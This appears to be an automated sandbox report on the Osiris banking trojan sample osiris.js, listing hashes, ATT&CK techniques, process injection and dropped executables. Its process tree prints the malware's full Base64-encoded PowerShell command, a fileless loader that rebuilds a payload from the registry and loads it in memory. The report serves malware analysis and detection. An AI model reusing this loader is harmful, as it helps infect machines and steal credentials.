osiris | 11c8dc17d50eb9393ca4b9db2ebf6be0989017cbabf39de8d0520e474ad40eb4

General

Target

osiris.js
Size

2.8MB
MD5

93b238ff0ba3cb0c1921882d90502124
SHA1

9aa505e0f1eb26ca769a715753450c47a89fdcdc
SHA256

11c8dc17d50eb9393ca4b9db2ebf6be0989017cbabf39de8d0520e474ad40eb4
SHA512

d6c7f571b8124b315f1a4eaa5f2aef3772823709957df050a4641ff45429f4891d957a2d9c730d6636f26fa058b6c5cf3bc67107cf5c1de0f1b4c635b6779690

Score

10^/10

osiris banker botnet spyware

Malware Config

Signatures

Osiris
banker botnet osiris
Executes dropped EXE 2 IoCs

Processes:

Admin.exeGetX64BTIT.exe

pid process

2360 Admin.exe
2476 GetX64BTIT.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

16 api.ipify.org
17 api.ipify.org
Uses Tor communications 1 TTPs
Malware can proxy its traffic through Tor for more anonymity.

Connection Proxy
T1090
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 3756 set thread context of 2360 3756 powershell.exe Admin.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
2360	Admin.exe
2476	GetX64BTIT.exe

flow	ioc
16	api.ipify.org
17	api.ipify.org

description	pid	process	target process
PID 3756 set thread context of 2360	3756	powershell.exe	Admin.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

Admin.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\IntelliForms\Storage2	Admin.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exeAdmin.exe

pid	process
3756	powershell.exe
3756	powershell.exe
3756	powershell.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe
2360	Admin.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 3756 powershell.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Admin.exe

pid process

2360 Admin.exe

description	pid	process
Token: SeDebugPrivilege	3756	powershell.exe

pid	process
2360	Admin.exe

Suspicious use of WriteProcessMemory 17 IoCs

Processes:

wscript.execmd.exepowershell.exeAdmin.exe

description	pid	process	target process
PID 3992 wrote to memory of 196	3992	wscript.exe	cmd.exe
PID 3992 wrote to memory of 196	3992	wscript.exe	cmd.exe
PID 196 wrote to memory of 3756	196	cmd.exe	powershell.exe
PID 196 wrote to memory of 3756	196	cmd.exe	powershell.exe
PID 196 wrote to memory of 3756	196	cmd.exe	powershell.exe
PID 3756 wrote to memory of 2360	3756	powershell.exe	Admin.exe
PID 3756 wrote to memory of 2360	3756	powershell.exe	Admin.exe
PID 3756 wrote to memory of 2360	3756	powershell.exe	Admin.exe
PID 3756 wrote to memory of 2360	3756	powershell.exe	Admin.exe
PID 3756 wrote to memory of 2360	3756	powershell.exe	Admin.exe
PID 3756 wrote to memory of 2360	3756	powershell.exe	Admin.exe
PID 3756 wrote to memory of 2360	3756	powershell.exe	Admin.exe
PID 3756 wrote to memory of 2360	3756	powershell.exe	Admin.exe
PID 3756 wrote to memory of 2360	3756	powershell.exe	Admin.exe
PID 3756 wrote to memory of 2360	3756	powershell.exe	Admin.exe
PID 2360 wrote to memory of 2476	2360	Admin.exe	GetX64BTIT.exe
PID 2360 wrote to memory of 2476	2360	Admin.exe	GetX64BTIT.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\osiris.js
1⤵
- Suspicious use of WriteProcessMemory
PID:3992

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "PAAjACAAagBxAGoAbgBqAGoAcQBjAGgAIAAjAD4AJAB1AD0AJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAxADMAMAAwADsAJABpACsAKwApAHsAJABjAD0AIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXAAiACsAJAB1ACsAIgAxACIAOwBUAHIAeQB7ACQAYQA9ACQAYQArACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AcABhAHQAaAAgACQAYwApAC4AJABpAH0AQwBhAHQAYwBoAHsAfQB9ADsAZgB1AG4AYwB0AGkAbwBuACAAYwBoAGIAYQB7AFsAYwBtAGQAbABlAHQAYgBpAG4AZABpAG4AZwAoACkAXQBwAGEAcgBhAG0AKABbAHAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUAKQBdAFsAUwB0AHIAaQBuAGcAXQAkAGgAcwApADsAJABCAHkAdABlAHMAIAA9ACAAWwBiAHkAdABlAFsAXQBdADoAOgBuAGUAdwAoACQAaABzAC4ATABlAG4AZwB0AGgAIAAvACAAMgApADsAZgBvAHIAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAaABzAC4ATABlAG4AZwB0AGgAOwAgACQAaQArAD0AMgApAHsAJABCAHkAdABlAHMAWwAkAGkALwAyAF0AIAA9ACAAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAHkAdABlACgAJABoAHMALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMgApACwAIAAxADYAKQB9ACQAQgB5AHQAZQBzAH0AOwAkAGkAIAA9ACAAMAA7AFcAaABpAGwAZQAgACgAJABUAHIAdQBlACkAewAkAGkAKwArADsAJABrAG8AIAA9ACAAWwBtAGEAdABoAF0AOgA6AFMAcQByAHQAKAAkAGkAKQA7AGkAZgAgACgAJABrAG8AIAAtAGUAcQAgADEAMAAwADAAKQB7ACAAYgByAGUAYQBrAH0AfQBbAGIAeQB0AGUAWwBdAF0AJABiACAAPQAgAGMAaABiAGEAKAAkAGEALgByAGUAcABsAGEAYwBlACgAIgAjACIALAAkAGsAbwApACkAOwBbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgApADsAWwBNAG8AZABlAF0AOgA6AFMAZQB0AHUAcAAoACkAOwA= "
2⤵
- Suspicious use of WriteProcessMemory
PID:196

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -En "PAAjACAAagBxAGoAbgBqAGoAcQBjAGgAIAAjAD4AJAB1AD0AJABlAG4AdgA6AFUAcwBlAHIATgBhAG0AZQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAxADMAMAAwADsAJABpACsAKwApAHsAJABjAD0AIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXAAiACsAJAB1ACsAIgAxACIAOwBUAHIAeQB7ACQAYQA9ACQAYQArACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AcABhAHQAaAAgACQAYwApAC4AJABpAH0AQwBhAHQAYwBoAHsAfQB9ADsAZgB1AG4AYwB0AGkAbwBuACAAYwBoAGIAYQB7AFsAYwBtAGQAbABlAHQAYgBpAG4AZABpAG4AZwAoACkAXQBwAGEAcgBhAG0AKABbAHAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUAKQBdAFsAUwB0AHIAaQBuAGcAXQAkAGgAcwApADsAJABCAHkAdABlAHMAIAA9ACAAWwBiAHkAdABlAFsAXQBdADoAOgBuAGUAdwAoACQAaABzAC4ATABlAG4AZwB0AGgAIAAvACAAMgApADsAZgBvAHIAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAaABzAC4ATABlAG4AZwB0AGgAOwAgACQAaQArAD0AMgApAHsAJABCAHkAdABlAHMAWwAkAGkALwAyAF0AIAA9ACAAWwBjAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAHkAdABlACgAJABoAHMALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMgApACwAIAAxADYAKQB9ACQAQgB5AHQAZQBzAH0AOwAkAGkAIAA9ACAAMAA7AFcAaABpAGwAZQAgACgAJABUAHIAdQBlACkAewAkAGkAKwArADsAJABrAG8AIAA9ACAAWwBtAGEAdABoAF0AOgA6AFMAcQByAHQAKAAkAGkAKQA7AGkAZgAgACgAJABrAG8AIAAtAGUAcQAgADEAMAAwADAAKQB7ACAAYgByAGUAYQBrAH0AfQBbAGIAeQB0AGUAWwBdAF0AJABiACAAPQAgAGMAaABiAGEAKAAkAGEALgByAGUAcABsAGEAYwBlACgAIgAjACIALAAkAGsAbwApACkAOwBbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgApADsAWwBNAG8AZABlAF0AOgA6AFMAZQB0AHUAcAAoACkAOwA= "
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3756

C:\Users\Admin\AppData\Roaming\Admin.exe
"C:\Users\Admin\AppData\Roaming\Admin.exe"
4⤵
- Executes dropped EXE
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2360

C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe
"C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe"
5⤵
- Executes dropped EXE
PID:2476

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Credentials in Files

1

T1081

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Data from Local System

1

T1005

Exfiltration

Command and Control

Connection Proxy

1

T1090

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe
MD5
b4cd27f2b37665f51eb9fe685ec1d373

SHA1
7f08febf0fdb7fc9f8bf35a10fb11e7de431abe0

SHA256
91f1023142b7babf6ff75dad984c2a35bde61dc9e61f45483f4b65008576d581

SHA512
e025f65224d78f5fd0abebe281ac0d44a385b2641e367cf39eed6aefada20a112ac47f94d7febc4424f1db6a6947bac16ff83ef93a8d745b3cddfdbe64c49a1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe
MD5
b4cd27f2b37665f51eb9fe685ec1d373

SHA1
7f08febf0fdb7fc9f8bf35a10fb11e7de431abe0

SHA256
91f1023142b7babf6ff75dad984c2a35bde61dc9e61f45483f4b65008576d581

SHA512
e025f65224d78f5fd0abebe281ac0d44a385b2641e367cf39eed6aefada20a112ac47f94d7febc4424f1db6a6947bac16ff83ef93a8d745b3cddfdbe64c49a1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\x64btit.txt
MD5
4b669744a47d57491bafdc34594d1d83

SHA1
e59fcf8262b67b5481c8e8e182ba675a005435cc

SHA256
f2e34421ee8298153c1f03e3fa44d1c83e5ad57f3cfd3fa6f6456bbb1517deb3

SHA512
dc935a4f1bf9ea32d2c8ac9481fb9ef818b15addc02bb45e15470e30a8ed3caeb57fd233be2a0f7d152937cfb1e59461c0d178f14aacd8636a40b8fe9b97169a

Download Submit
C:\Users\Admin\AppData\Roaming\Admin.exe
MD5
4db1ee663bd9f021da04edca144f4bd7

SHA1
709d318281ceabef246af0107b1db12f237b793a

SHA256
3002d2fc90595dd4688518b300323aaf26d4ae09cb33b2b580cbec41b43d8eb6

SHA512
ec3b1615e1751fad8cf4f6b6cf8739d972ab7aa4d23a84167e159f15b4842bc3ec09bb4b4daf31570e0d88d466e0a4c5eac16f97169dfb020c5758ce568ce565

Download Submit
C:\Users\Admin\AppData\Roaming\Admin.exe
MD5
4db1ee663bd9f021da04edca144f4bd7

SHA1
709d318281ceabef246af0107b1db12f237b793a

SHA256
3002d2fc90595dd4688518b300323aaf26d4ae09cb33b2b580cbec41b43d8eb6

SHA512
ec3b1615e1751fad8cf4f6b6cf8739d972ab7aa4d23a84167e159f15b4842bc3ec09bb4b4daf31570e0d88d466e0a4c5eac16f97169dfb020c5758ce568ce565

Download Submit
memory/196-3-0x0000000000000000-mapping.dmp

Download
memory/2360-23-0x0000000000400000-0x0000000000456000-memory.dmp

Filesize
344KB

Download
memory/2360-28-0x0000000000530000-0x00000000005CF000-memory.dmp

Filesize
636KB

Download
memory/2360-27-0x0000000000400000-0x0000000000456000-memory.dmp

Filesize
344KB

Download
memory/2360-24-0x0000000000401698-mapping.dmp

Download
memory/2476-29-0x0000000000000000-mapping.dmp

Download
memory/3756-10-0x0000000007360000-0x0000000007361000-memory.dmp

Filesize
4KB

Download
memory/3756-14-0x0000000007DB0000-0x0000000007DB1000-memory.dmp

Filesize
4KB

Download
memory/3756-16-0x0000000008500000-0x0000000008501000-memory.dmp

Filesize
4KB

Download
memory/3756-17-0x00000000095C0000-0x00000000095C1000-memory.dmp

Filesize
4KB

Download
memory/3756-18-0x0000000009280000-0x0000000009281000-memory.dmp

Filesize
4KB

Download
memory/3756-19-0x00000000092E0000-0x00000000092E1000-memory.dmp

Filesize
4KB

Download
memory/3756-20-0x0000000009B60000-0x0000000009B61000-memory.dmp

Filesize
4KB

Download
memory/3756-21-0x0000000009670000-0x0000000009672000-memory.dmp

Filesize
8KB

Download
memory/3756-22-0x00000000097B0000-0x0000000009923000-memory.dmp

Filesize
1.4MB

Download
memory/3756-15-0x0000000008680000-0x0000000008681000-memory.dmp

Filesize
4KB

Download
memory/3756-13-0x0000000007F50000-0x0000000007F51000-memory.dmp

Filesize
4KB

Download
memory/3756-12-0x0000000007470000-0x0000000007471000-memory.dmp

Filesize
4KB

Download
memory/3756-11-0x0000000007400000-0x0000000007401000-memory.dmp

Filesize
4KB

Download
memory/3756-9-0x0000000007102000-0x0000000007103000-memory.dmp

Filesize
4KB

Download
memory/3756-8-0x0000000007100000-0x0000000007101000-memory.dmp

Filesize
4KB

Download
memory/3756-7-0x0000000007740000-0x0000000007741000-memory.dmp

Filesize
4KB

Download
memory/3756-6-0x0000000004D70000-0x0000000004D71000-memory.dmp

Filesize
4KB

Download
memory/3756-5-0x00000000739A0000-0x000000007408E000-memory.dmp

Filesize
6.9MB

Download
memory/3756-4-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads